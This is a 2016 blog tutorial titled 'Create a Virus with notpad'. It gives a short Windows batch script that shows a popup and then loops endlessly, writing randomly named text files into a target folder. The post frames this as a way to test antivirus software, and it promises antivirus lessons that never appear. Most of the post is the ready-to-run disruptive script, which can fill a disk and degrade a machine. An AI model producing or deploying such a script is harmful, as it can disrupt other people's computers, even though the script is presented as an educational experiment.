Wednesday, 3 August 2016

Create a Virus with notpad

Hi Guys,
This tutorial is to teach you how hackers create viruses, it would also teach you how antiviruses work and the simple way to create your own antivirus.
Disclaimer: This tutorial is for educational purposes only. Although this could be used to create a very troubling Virus, you should only use this for experimental reasons. This virus does not attack your computer's operating system environment and therefore should be safe. Please do not use this maliciously.
Launch the virus and see if your antivirus can pick on it. This would help you know if your antivirus is strong and suitable.

Step 1: Creating the Virus - BloatWare

Picture of Creating the Virus - BloatWare
Create your target folder - this is the folder you want your virus to attack.
For demonstration purposes, I have created a folder called Test under the C Drive.
C:\Test
This virus would create an endless number of text files which contains a different number in the text document each time.

@echo off
color 0a
msg *You have just launched BloatWarez %random% 
:Reckon 
echo This is bloatware #%random% >C:\Test\%random%%random%.virus.txt
goto Reckon
PS: The code above will bloat the folder as it would create an infinite number of text documents
Remember that you can change what the user sees in each document so "This is bloatware #%random%" could be anything of your choosing.

No comments:

Post a Comment